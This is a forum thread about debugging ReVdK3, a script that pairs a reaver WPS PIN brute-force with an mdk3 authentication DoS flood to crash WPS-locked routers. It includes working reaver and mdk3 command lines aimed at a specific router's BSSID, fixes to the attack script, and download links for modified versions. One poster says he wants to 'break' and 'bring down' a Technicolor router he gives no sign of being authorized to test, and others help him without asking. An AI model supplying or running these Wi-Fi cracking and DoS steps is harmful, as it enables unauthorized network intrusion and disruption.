Reaver "AP rate limiting detected" and automatic mdk3 solution

[cooper]

Open the file in a text editor. There are 2 lines that look like this:

EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f1`;

You need to change BOTH to

EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f2`;

If after this things still fail, post the output of the airmon-ng command when run without any parameters.

[DavieBoiii]

Open the file in a text editor. There are 2 lines that look like this:

EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f1`;

You need to change BOTH to

EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f2`;

If after this things still fail, post the output of the airmon-ng command when run without any parameters.

Thank you so much for explaining it to me! You are my hero hehe.

The wlan0 is working now as it should almost.

When i start mdk3 and make a:

Authentication DoS Flood Attack

It starts the process but i get a message:

No replay interface specified.

"aireplay-ng --help" for help.

Please wait..

I am stuck again!

dont know what 2 do from here.

I am trying to break a Technicolor router that has WPS LOCKED set to YES.

So i want to bring down router so i can start breaking the wps pin.

I can only post one more message after this post. but maybe i can send pm to you directly. Thank you so fucking much for helping me out!!!

[cooper]

When you select the "Authentication DoS Flood Attack" you should be presented with a line that reads:

mdk3 <SOMETHING1> a -a <SOMETHING> -s 200 & mdk3 <SOMETHING2> a -a <SOMETHING> -s 200 & mdk3 <SOMETHING3> a -a <SOMETHING> -s 200

Please state what on that line the values for the 4 different SOMETHINGs are.

Also, again, post the output of the 'airmon-ng' command, when run without any parameters.

[DavieBoiii]

root@kali:~# ifconfig wlan0 down
root@kali:~# ifconfig wlan0 mode monitor
mode: Host name lookup failure
ifconfig: `--help' gives usage information.
root@kali:~# iwconfig wlan0 mode monitor
root@kali:~# ifconfig wlan0 up
root@kali:~# airmon-ng
PHY Interface Driver Chipset

phy0 wlan0 rtl8723be Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter

/////////////////////////////////

What is the essid of the access point you are targeting:TN_24GHz_1DB711
ESSID saved...
I am hiding your identity by changing your mac
down: error fetching interface information: Device not found
down: error fetching interface information: Device not found
down: error fetching interface information: Device not found
down: error fetching interface information: Device not found
down: error fetching interface information: Device not found
down: error fetching interface information: Device not found
[ERROR] Set device name: No such device
[ERROR] Set device name: No such device
[ERROR] Set device name: No such device
up: error fetching interface information: Device not found
up: error fetching interface information: Device not found
up: error fetching interface information: Device not found
up: error fetching interface information: Device not found
up: error fetching interface information: Device not found
up: error fetching interface information: Device not found

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
x REAVER COMMAND LINE YOU HAVE CHOOSEN x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

reaver -i -b C4:EA:1D:1D:B7:11 -S -c 6 -l 10 -N -vv

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xThe Authentication DoS Flood Command line below will be used x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

mdk3 a -a C4:EA:1D:1D:B7:1 -s 200 & mdk3 a -a C4:EA:1D:1D:B7:1 -s 200 & mdk3 a -a C4:EA:1D:1D:B7:1 -s 200

To start the attack press ENTER to proceed or input 'r' to return to mdk3 main menu:

I hope i posted the right information for you. The airmon ng command i posted in the beginning of this post is how i stup the interface before starting mdk3.

[ZaraByte]

I was working on a update to the ReVdK3-r1 but stopped cause I had other things to do I think the last time i was working on this I was having an issue with reaver window would show up then it switches to a aireplay-ng --help ect ..

I think its some thing to do with mon1 mon2 mon3 the script doesn't put up 3 monitor mode interfaces I noticed to and I think that has to do with the new aircrack-ng

Edited November 17, 2015 by ZaraByte

[Jasz]

When i start mdk3 and make a:

Authentication DoS Flood Attack

It starts the process but i get a message:

No replay interface specified.

"aireplay-ng --help" for help.

Please wait..

This just repeats over and over for me also.

Can someone help me out with this.

Let me know what you need?

[cooper]

It would help if you posted the exact mdk3 command you issued and the output of the 'iwconfig' command, without any parameters.

[DavieBoiii]

When you select the "Authentication DoS Flood Attack" you should be presented with a line that reads:

mdk3 <SOMETHING1> a -a <SOMETHING> -s 200 & mdk3 <SOMETHING2> a -a <SOMETHING> -s 200 & mdk3 <SOMETHING3> a -a <SOMETHING> -s 200

Please state what on that line the values for the 4 different SOMETHINGs are.

Also, again, post the output of the 'airmon-ng' command, when run without any parameters.

I have solved the problem by downloading kali linux 1.10 instead of 2.0.

It works for a bit now. I get the terminals working with revdk3.r2ls

But it dont seems to be able to bring down the WPS locked router.

This is the message it keeps saying to me.

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

root@kali:~# 12:22:36 Sending keep-alive packet

bash: 12:22:36: command not found

root@kali:~# 12:22:39 Sending keep-alive packet

bash: 12:22:39: command not found

root@kali:~# 12:22:42 Sending keep-alive packet

bash: 12:22:42: command not found

root@kali:~# 12:22:45 Sending keep-alive packet

bash: 12:22:45: command not found

root@kali:~# 12:22:48 Sending keep-alive packet

bash: 12:22:48: command not found

root@kali:~# 12:22:51 Sending keep-alive packet

bash: 12:22:51: command not found

root@kali:~# 12:22:54 Sending keep-alive packet

bash: 12:22:54: command not found

root@kali:~# 12:22:57 Sending keep-alive packet

bash: 12:22:57: command not found

root@kali:~# [+] Switching mon0 to channel 6

bash: [+]: command not found

root@kali:~# [+] Waiting for beacon from C4:EA:1D:1D:B7:11

bash: [+]: command not found

root@kali:~# [!] WARNING: Failed to associate with C4:EA:1D:1D:B7:11 (ESSID: TN_24GHz_1DB711)

bash: syntax error near unexpected token `('

root@kali:~# [!] WARNING: Failed to associate with C4:EA:1D:1D:B7:11 (ESSID: TN_24GHz_1DB711)

bash: syntax error near unexpected token `('

root@kali:~# [!] WARNING: Failed to associate with C4:EA:1D:1D:B7:11 (ESSID: TN_24GHz_1DB711)

bash: syntax error near unexpected token `('

root@kali:~# [!] WARNING: Failed to associate with C4:EA:1D:1D:B7:11 (ESSID: TN_24GHz_1DB711)

bash: syntax error near unexpected token `('

root@kali:~# [!] WARNING: Failed to associate with C4:EA:1D:1D:B7:11 (ESSID: TN_24GHz_1DB711)

bash: syntax error near unexpected token `('

root@kali:~# [+] Associated with C4:EA:1D:1D:B7:11 (ESSID: TN_24GHz_1DB711)

bash: syntax error near unexpected token `('

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

bash: [!]: command not found

root@kali:~# [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-check

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

And this one.root@kali:~# 12:21:16 Sending keep-alive packet

bash: 12:21:16: command not found

root@kali:~# 12:21:19 Sending keep-alive packet

bash: 12:21:19: command not found

root@kali:~# 12:21:22 Sending keep-alive packet

bash: 12:21:22: command not found

root@kali:~# 12:21:25 Sending keep-alive packet

bash: 12:21:25: command not found

root@kali:~# 12:21:28 Sending keep-alive packet

bash: 12:21:28: command not found

root@kali:~# 12:21:31 Sending keep-alive packet

bash: 12:21:31: command not found

root@kali:~# 12:21:34 Sending keep-alive packet

bash: 12:21:34: command not found

root@kali:~# 12:21:37 Sending keep-alive packet

bash: 12:21:37: command not found

root@kali:~# 12:21:40 Sending keep-alive packet

bash: 12:21:40: command not found

root@kali:~# 12:21:43 Sending keep-alive packet

bash: 12:21:43: command not found

root@kali:~# 12:21:46 Sending keep-alive packet

bash: 12:21:46: command not found

root@kali:~# 12:21:49 Sending keep-alive packet

bash: 12:21:49: command not found

root@kali:~# 12:21:52 Sending keep-alive packet

bash: 12:21:52: command not found

root@kali:~# 12:21:55 Sending keep-alive packet

bash: 12:21:55: command not found

root@kali:~# 12:21:58 Sending keep-alive packet

bash: 12:21:58: command not found

root@kali:~# 12:22:01 Sending keep-alive packet

bash: 12:22:01: command not found

root@kali:~# 12:22:04 Sending keep-alive packet

bash: 12:22:04: command not found

root@kali:~# 12:22:07 Sending keep-alive packet

bash: 12:22:07: command not found

root@kali:~# 12:22:10 Sending keep-alive packet

bash: 12:22:10: command not found

root@kali:~# 12:22:13 Sending keep-alive packet

bash: 12:22:13: command not found

root@kali:~# 12:22:16 Sending keep-alive packet

bash: 12:22:16: command not found

root@kali:~# 12:22:19 Sending keep-alive packet

bash: 12:22:19: command not found

root@kali:~# 12:22:22 Sending keep-alive packet

bash: 12:22:22: command not found

root@kali:~# 12:22:25 Sending keep-alive packet

bash: 12:22:25: command not found

root@kali:~# 12:22:28 Sending keep-alive packet

bash: 12:22:28: command not found

root@kali:~# 12:22:28 Got a deauthentication packet! (Waiting 3 seconds)

bash: syntax error near unexpected token `('

root@kali:~#

root@kali:~# 12:22:31 Sending Authentication Request (Open System)

bash: syntax error near unexpected token `('

root@kali:~# 12:22:32 Authentication successful

bash: 12:22:32: command not found

root@kali:~# 12:22:32 Sending Association Request

bash: 12:22:32: command not found

root@kali:~# 12:22:33 Association successful :-) (AID: 1)

bash: syntax error near unexpected token `)'

root@kali:~#

root@kali:~# 12:22:36 Sending keep-alive packet

bash: 12:22:36: command not found

root@kali:~# 12:22:39 Sending keep-alive packet

bash: 12:22:39: command not found

root@kali:~# 12:22:42 Sending keep-alive packet

bash: 12:22:42: command not found

root@kali:~# 12:22:45 Sending keep-alive packet

bash: 12:22:45: command not found

root@kali:~# 12:22:48 Sending keep-alive packet

bash: 12:22:48: command not found

root@kali:~# 12:22:51 Sending keep-alive packet

bash: 12:22:51: command not found

root@kali:~# 12:22:54 Sending keep-alive packet

bash: 12:22:54: command not found

root@kali:~# 12:22:57 Sending keep-alive packet

bash: 12:22:57: command not found

root@kali:~# 12:23:00 Sending keep-alive packet

bash: 12:23:00: command not found

root@kali:~# 12:23:03 Sending keep-alive packet

bash: 12:23:03: command not found

root@kali:~# 12:23:06 Sending keep-alive packet

bash: 12:23:06: command not found

root@kali:~# 12:23:09 Sending keep-alive packet

bash: 12:23:09: command not found

root@kali:~# 12:23:12 Sending keep-alive packet

bash: 12:23:12: command not found

root@kali:~# 12:23:15 Sending keep-alive packet

bash: 12:23:15: command not found

root@kali:~# 12:23:18 Sending keep-alive packet

bash: 12:23:18: command not found

root@kali:~# 12:23:21 Sending keep-alive packet

bash: 12:23:21: command not found

root@kali:~# 12:23:24 Sending keep-alive packet

bash: 12:23:24: command not found

root@kali:~# 12:23:27 Sending keep-alive packet

bash: 12:23:27: command not found

root@kali:~# 12:23:30 Sending keep-alive packet

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

any ideas. maybe it is not possible to hack it with reaver. mayb the only way is to crack the wpa with bruteforcing. i dont know any more.

[cooper]

Okay, the new airmon-ng on Kali 2.0 doesn't allow you to start multiple monitoring interfaces on the same device, which is what the script apparently tried to do.

I'm working on an overhauled version of the script that works on Kali 2.0 but works by using only 1 monitoring interface per wifi adapter.

[adry803]

Hey guys. Glad to find people working on this scripts up to the date.

I tried the expiremental version ReVdK3-r3 for Kali 2.0. It's pretty much compatible and bug free against kali 2.0. Give it a shot.

Download it at the bottom of this page: http://www.crazycodes.org/revdk3.html

I'm currently working on a router that mdk3 resets the WPS locked state via DoS a few times and then it becomes harder and longer until it no loger resets the WPS, until I get fed up and stop the script. I wonder if anyone has any thoughts on this? All tips appreciated.

Which one of the mdk3 types of attack would you recommend more?

Thanks for all the work to you all scripters.

[cooper]

There's still a small bug in the script. Specifically, this bit:

airmon-ng start $WLAN >/dev/null;
airmon-ng start $WLAN >/dev/null;
MON1=`airmon-ng|grep ''"$WLAN"|cut -f2`;
MON2=`airmon-ng|grep ''"$WLAN"|cut -f2`;
MON3=`airmon-ng|grep ''"$WLAN"|cut -f2`;

on lines 173-177 is odd. You start the monitoring interface for the wireless device, which is fine and results in the removal of the wireless device and the creation of the monitoring device. You then do this a second time which will fail because the wireless device to put into monitoring mode doesn't exist anymore.

Next you assign MON1, 2 and 3 to effectively the same device on the assumption that the name of the wireless interface is part of the name, which seems to be convention but I've never seen any guarantee of it.

Mind you, that's more a cleanliness issue and unless you're sporting multiple wireless devices chances are you'll never notice a problem.

It's good to know someone made an r3 as that means I'll need to give my version a different name.

[adry803]

Great stuff. Thanks for that. I haven't noticed a problem running the script so far though, sometimes I wonder if it's really running the DoS attacks from 3 monitors.

We'll be happy to try your version when it comes out. Looking forward to it.

[cooper]

With the old airmon-ng you could start multiple monitor interfaces for the same device. Since they're all on the exact same radio it didn't make much sense to do so, but maybe that's how they worked around not being able to open the device multiple times, an issue which has since been remedied.

The goal of the script is to have 3 concurrent programs doing their work over this one interface. The first is either bully or reaver to do a WPS pin attack, the second is mdk3 which tries to open so many client connections with the AP concurrently that it reboots, and finally aireplay-ng which is sending fakeauth reassociation requests. Again, everything is done via the same radio on a single channel, so you're limited to the amount of packets the device can spit into the ether and how the OS manages the simultaneous use of the device. It's worth noting that at least bully/reaver and mdk3 need to be receiving packets to work so if the device is only sending and never listening, this method will not work.

[unkown36]

you are right Cooper there is still a bug i keep getting errors but as mention before i'll be happy to try your version of the script!!

[cooper]

What are the errors you're getting?

[chunkingz]

For those still seeking the ReVdK3 script, i have modified the revision 2 of the script and it now works with the new aircrack suite and kali 2.0.

here is the link

http://www.datafilehost.com/d/888bcb3c

i'll also have to state that theres also an alternative script which is known as "VMR-MDK-K2-011x8.sh for Kali2.0"

see the original post on it here

https://forums.kali.org/showthread.php?27264-VMR-MDK-K2-011x8-sh-for-Kali2-0

[davtomic]

For those still seeking the ReVdK3 script, i have modified the revision 2 of the script and it now works with the new aircrack suite and kali 2.0.

here is the link

http://www.datafilehost.com/d/888bcb3c

i'll also have to state that theres also an alternative script which is known as "VMR-MDK-K2-011x8.sh for Kali2.0"

see the original post on it here

https://forums.kali.org/showthread.php?27264-VMR-MDK-K2-011x8-sh-for-Kali2-0

I tried your ReVdK3 script but for me it is not working.

Once AP rate limit is detected, script can not get rid of it, It is just keep repeating AP rate limiting.

If I use "old way", pause reaver, than run mdk3 mon0 a -a [MAC] -m for about half minute, than resume reaver, it is working good.

I tried every option in script, but it is not working, I am using Kali linux.

[chunkingz]

I tried your ReVdK3 script but for me it is not working.

Once AP rate limit is detected, script can not get rid of it, It is just keep repeating AP rate limiting.

If I use "old way", pause reaver, than run mdk3 mon0 a -a [MAC] -m for about half minute, than resume reaver, it is working good.

I tried every option in script, but it is not working, I am using Kali linux.

Well like I said earlier on there's an alternative script which is vmr-mdk personally I prefer Dat. So If revdk3 doesn't work for u... Try using vmr-mdk.

Dat being said after I made Dat post to both hak5 and kali forums I made some changes to the script again. So when I have time I'll re-upload it.

[davtomic]

Well like I said earlier on there's an alternative script which is vmr-mdk personally I prefer Dat. So If revdk3 doesn't work for u... Try using vmr-mdk.

Dat being said after I made Dat post to both hak5 and kali forums I made some changes to the script again. So when I have time I'll re-upload it.

I've downloaded vmr-mdk zip but it is to complicated for me. Right now I don't have time to read all instructions and run all that.

It would be great if you make it simple just as revdk3.

I really appreciate your work and looking forward for new version of revdk3 script which will, I hope, work for me.

[chunkingz]

OK for ur sake I'll try to make short video clip so u can understand and use it. ND also upload the updated script.

[chunkingz]

okay yeah so after so many stress full days i finally got a lil tym to make the screencast, hope u enjoy and understand it.

please like, share and subscribe.

https://youtu.be/y3ByYdVJFqg

[davtomic]

okay yeah so after so many stress full days i finally got a lil tym to make the screencast, hope u enjoy and understand it.

please like, share and subscribe.

https://youtu.be/y3ByYdVJFqg

Great, thank you

[i8igmac]

okay yeah so after so many stress full days i finally got a lil tym to make the screencast, hope u enjoy and understand it.

please like, share and subscribe.

https://youtu.be/y3ByYdVJFqg

Nice video.

Can some post the script on pastbin... I would like to view source...

It looked like the networking service was restarted at the end of the video that suggest a wpa config was made with the pin configured and authentication with the access point was completed?

[chunkingz]

Nice video.

Can some post the script on pastbin... I would like to view source...

It looked like the networking service was restarted at the end of the video that suggest a wpa config was made with the pin configured and authentication with the access point was completed?

thanks, and yes the network-manager restarts at the end of a successful run, or when you hit ctrl+c. but i dont think it connects you automatically to the ap.

well as for the source code you'll have to download it from the links provided above or in the video cos i dont think ill be chanced to copy-paste codes.

except there's a good samaritan around. :)

[dodgeyrog]

Hi I have the script downloaded but when wash fires up I get the found packet with bad FCS , skipping - I normally get around this when running manually with -C

Can you advise where I can add that into the script to avoid this error on my machine

Thanks